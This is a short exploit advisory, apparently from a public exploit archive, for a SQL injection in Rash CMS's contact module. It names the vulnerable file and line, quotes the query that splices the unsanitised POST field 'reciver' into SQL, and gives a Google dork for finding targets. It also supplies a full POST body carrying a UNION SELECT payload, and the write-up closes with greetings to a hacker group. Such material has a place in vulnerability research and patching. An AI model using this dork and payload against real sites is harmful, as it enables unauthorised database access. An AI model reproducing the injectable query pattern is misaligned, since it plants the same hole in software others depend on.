1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 |
========================================== Rash CMS SQL Injection Vulnerability ========================================== [~]######################################### InformatioN #############################################[~] [~] Title : Rash CMS SQL Injection Vulnerability [~] Author: keracker [~] Vendor or Software Link: http://rashcms.com [~] Email : keracker@gmail.com [~] Data: 2011-04-01 [~] Google dork: ":: RashCMS :: - :: MihanPHP ::" [~] Category:[Webapps] [~] Tested on: [Windows /php] [~]######################################### ExploiT #############################################[~] [~] Vulnerable File : http://127.0.0.1/module/contact/contact-config.php LINE: 54 CODE: $q = $d->getrows("SELECT <code>u_id</code> FROM <code>permissions</code> WHERE access_admin_area</code>='1' AND <code>u_id</code>=$_POST[reciver]",true); go to http://127.0.0.1/index.php?module=contact You have to post injection code in "reciver" you can use LIVE HTTP HEADERS firefox addone to exploit it like this: name=%D8%B4&email=a%40d.com&site=s&tell=1234567&reciver=-1+union+all+select+version()--&text=aaaaaaa&RashCMS=777577&submit=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%A7%D9%85 Demo: http://intrepidrealty.net/rashcms.GIF [~]######################################### ThankS To ... ############################################[~] [~] IRANIAN Young HackerZ # Persian Gulf [~]######################################### FinisH :D #############################################[~]################[~] |